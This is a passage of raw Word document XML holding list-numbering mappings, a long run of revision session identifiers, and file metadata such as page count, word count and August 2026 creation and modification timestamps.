    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1248882402">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1724209963">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="664480796">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="642124147">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1098646586">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="13983579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317FD"/>
    <w:rsid w:val="000431B2"/>
    <w:rsid w:val="00044A70"/>
    <w:rsid w:val="00067643"/>
    <w:rsid w:val="00076B5E"/>
    <w:rsid w:val="00087977"/>
    <w:rsid w:val="00094254"/>
    <w:rsid w:val="000B3AC0"/>
    <w:rsid w:val="000C71D9"/>
    <w:rsid w:val="000D3BE5"/>
    <w:rsid w:val="000D4962"/>
    <w:rsid w:val="000D5ADC"/>
    <w:rsid w:val="001072B1"/>
    <w:rsid w:val="00132074"/>
    <w:rsid w:val="00134E62"/>
    <w:rsid w:val="00136B99"/>
    <w:rsid w:val="00157C62"/>
    <w:rsid w:val="0017603D"/>
    <w:rsid w:val="0018124E"/>
    <w:rsid w:val="00183C06"/>
    <w:rsid w:val="00191A3D"/>
    <w:rsid w:val="00193936"/>
    <w:rsid w:val="001B0CF7"/>
    <w:rsid w:val="001B587D"/>
    <w:rsid w:val="001D0A0D"/>
    <w:rsid w:val="001D40EB"/>
    <w:rsid w:val="001E15E4"/>
    <w:rsid w:val="00206C93"/>
    <w:rsid w:val="00226640"/>
    <w:rsid w:val="00237747"/>
    <w:rsid w:val="00242356"/>
    <w:rsid w:val="0026348A"/>
    <w:rsid w:val="00271BB0"/>
    <w:rsid w:val="00274644"/>
    <w:rsid w:val="002A0DC0"/>
    <w:rsid w:val="002A6886"/>
    <w:rsid w:val="002A7973"/>
    <w:rsid w:val="002B27F1"/>
    <w:rsid w:val="002B67B0"/>
    <w:rsid w:val="002C45CF"/>
    <w:rsid w:val="002D40EA"/>
    <w:rsid w:val="002D55CC"/>
    <w:rsid w:val="002F5241"/>
    <w:rsid w:val="002F5C4A"/>
    <w:rsid w:val="003031FD"/>
    <w:rsid w:val="0030648E"/>
    <w:rsid w:val="00314EE9"/>
    <w:rsid w:val="00337E8E"/>
    <w:rsid w:val="003558C8"/>
    <w:rsid w:val="00370940"/>
    <w:rsid w:val="00396C5D"/>
    <w:rsid w:val="003C3B8B"/>
    <w:rsid w:val="003E39F5"/>
    <w:rsid w:val="003F6B3A"/>
    <w:rsid w:val="0040536F"/>
    <w:rsid w:val="0040656A"/>
    <w:rsid w:val="00433F6D"/>
    <w:rsid w:val="00434056"/>
    <w:rsid w:val="00450EEF"/>
    <w:rsid w:val="0045296C"/>
    <w:rsid w:val="00457EF5"/>
    <w:rsid w:val="004B575E"/>
    <w:rsid w:val="004B606C"/>
    <w:rsid w:val="004C48E5"/>
    <w:rsid w:val="004E0B9E"/>
    <w:rsid w:val="004E5327"/>
    <w:rsid w:val="004F1930"/>
    <w:rsid w:val="004F2A66"/>
    <w:rsid w:val="00521DFF"/>
    <w:rsid w:val="005552D0"/>
    <w:rsid w:val="00557D6A"/>
    <w:rsid w:val="00575260"/>
    <w:rsid w:val="005A2E4F"/>
    <w:rsid w:val="005A5D3F"/>
    <w:rsid w:val="005A7037"/>
    <w:rsid w:val="005B77F3"/>
    <w:rsid w:val="005E43A5"/>
    <w:rsid w:val="00623A9C"/>
    <w:rsid w:val="00624774"/>
    <w:rsid w:val="00642845"/>
    <w:rsid w:val="00650832"/>
    <w:rsid w:val="006545D3"/>
    <w:rsid w:val="00657247"/>
    <w:rsid w:val="006819DD"/>
    <w:rsid w:val="006829B1"/>
    <w:rsid w:val="006A51E8"/>
    <w:rsid w:val="006A6025"/>
    <w:rsid w:val="006B5B51"/>
    <w:rsid w:val="006C0AB4"/>
    <w:rsid w:val="006E4BB8"/>
    <w:rsid w:val="006F0CE2"/>
    <w:rsid w:val="006F5894"/>
    <w:rsid w:val="0073568C"/>
    <w:rsid w:val="007371B0"/>
    <w:rsid w:val="00741C12"/>
    <w:rsid w:val="00744A93"/>
    <w:rsid w:val="00754563"/>
    <w:rsid w:val="00771EF8"/>
    <w:rsid w:val="00773C1C"/>
    <w:rsid w:val="00790D60"/>
    <w:rsid w:val="0079318A"/>
    <w:rsid w:val="00796701"/>
    <w:rsid w:val="007A3B61"/>
    <w:rsid w:val="007A4041"/>
    <w:rsid w:val="007B3FFD"/>
    <w:rsid w:val="007B5FC1"/>
    <w:rsid w:val="007C4C67"/>
    <w:rsid w:val="007D3914"/>
    <w:rsid w:val="007F57DB"/>
    <w:rsid w:val="00823F01"/>
    <w:rsid w:val="00842AB2"/>
    <w:rsid w:val="008448D3"/>
    <w:rsid w:val="00853A91"/>
    <w:rsid w:val="00860062"/>
    <w:rsid w:val="00883EC6"/>
    <w:rsid w:val="008B0A05"/>
    <w:rsid w:val="008B3725"/>
    <w:rsid w:val="008C0F53"/>
    <w:rsid w:val="008C49EC"/>
    <w:rsid w:val="008C74EB"/>
    <w:rsid w:val="008D6543"/>
    <w:rsid w:val="008E5214"/>
    <w:rsid w:val="00901CAE"/>
    <w:rsid w:val="00931F18"/>
    <w:rsid w:val="009356A3"/>
    <w:rsid w:val="009474BB"/>
    <w:rsid w:val="00951C3C"/>
    <w:rsid w:val="0096565E"/>
    <w:rsid w:val="00971DA7"/>
    <w:rsid w:val="009727D5"/>
    <w:rsid w:val="00976457"/>
    <w:rsid w:val="0099495A"/>
    <w:rsid w:val="009A1A24"/>
    <w:rsid w:val="009B0BBD"/>
    <w:rsid w:val="009C3A30"/>
    <w:rsid w:val="009E0421"/>
    <w:rsid w:val="00A118F0"/>
    <w:rsid w:val="00A226F7"/>
    <w:rsid w:val="00A358BE"/>
    <w:rsid w:val="00A56365"/>
    <w:rsid w:val="00A631CF"/>
    <w:rsid w:val="00A703F6"/>
    <w:rsid w:val="00A75C93"/>
    <w:rsid w:val="00AA0171"/>
    <w:rsid w:val="00AA61B0"/>
    <w:rsid w:val="00AE72FE"/>
    <w:rsid w:val="00AF4B41"/>
    <w:rsid w:val="00AF6CFE"/>
    <w:rsid w:val="00B0403B"/>
    <w:rsid w:val="00B07444"/>
    <w:rsid w:val="00B33538"/>
    <w:rsid w:val="00B42EB9"/>
    <w:rsid w:val="00B63114"/>
    <w:rsid w:val="00B63D66"/>
    <w:rsid w:val="00B667B2"/>
    <w:rsid w:val="00B67506"/>
    <w:rsid w:val="00B71BF0"/>
    <w:rsid w:val="00BA2E69"/>
    <w:rsid w:val="00BB7EAC"/>
    <w:rsid w:val="00BE522A"/>
    <w:rsid w:val="00BF2D76"/>
    <w:rsid w:val="00BF64DD"/>
    <w:rsid w:val="00C06689"/>
    <w:rsid w:val="00C21C55"/>
    <w:rsid w:val="00C314DD"/>
    <w:rsid w:val="00C469AB"/>
    <w:rsid w:val="00C504B3"/>
    <w:rsid w:val="00C52DAF"/>
    <w:rsid w:val="00C9210B"/>
    <w:rsid w:val="00C933C9"/>
    <w:rsid w:val="00CA019C"/>
    <w:rsid w:val="00CA1BA0"/>
    <w:rsid w:val="00CA22D1"/>
    <w:rsid w:val="00CB27F3"/>
    <w:rsid w:val="00CC5CE8"/>
    <w:rsid w:val="00CD1B2B"/>
    <w:rsid w:val="00CD73C1"/>
    <w:rsid w:val="00CE68AC"/>
    <w:rsid w:val="00CF0AED"/>
    <w:rsid w:val="00CF53A0"/>
    <w:rsid w:val="00D1094A"/>
    <w:rsid w:val="00D36761"/>
    <w:rsid w:val="00D40C14"/>
    <w:rsid w:val="00D53BEE"/>
    <w:rsid w:val="00D712C8"/>
    <w:rsid w:val="00D76C03"/>
    <w:rsid w:val="00DB34D7"/>
    <w:rsid w:val="00DD0C11"/>
    <w:rsid w:val="00DE1B90"/>
    <w:rsid w:val="00DF7ED3"/>
    <w:rsid w:val="00E030B5"/>
    <w:rsid w:val="00E2500D"/>
    <w:rsid w:val="00E547DC"/>
    <w:rsid w:val="00E81F50"/>
    <w:rsid w:val="00EA1275"/>
    <w:rsid w:val="00EB7E1B"/>
    <w:rsid w:val="00EC1304"/>
    <w:rsid w:val="00ED04A7"/>
    <w:rsid w:val="00EE2BE9"/>
    <w:rsid w:val="00EF00E3"/>
    <w:rsid w:val="00EF1D99"/>
    <w:rsid w:val="00F20CC8"/>
    <w:rsid w:val="00F302F8"/>
    <w:rsid w:val="00F30848"/>
    <w:rsid w:val="00F3402E"/>
    <w:rsid w:val="00F64BA8"/>
    <w:rsid w:val="00FB339D"/>
    <w:rsid w:val="00FC4756"/>
    <w:rsid w:val="00FD084F"/>
    <w:rsid w:val="00FD455C"/>
    <w:rsid w:val="00FD4D10"/>
    <w:rsid w:val="00FE4F8E"/>
    <w:rsid w:val="00FF075C"/>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15</Pages>
  <Words>4302</Words>
  <Characters>24528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215</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-08-05T10:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-05T14:00:00Z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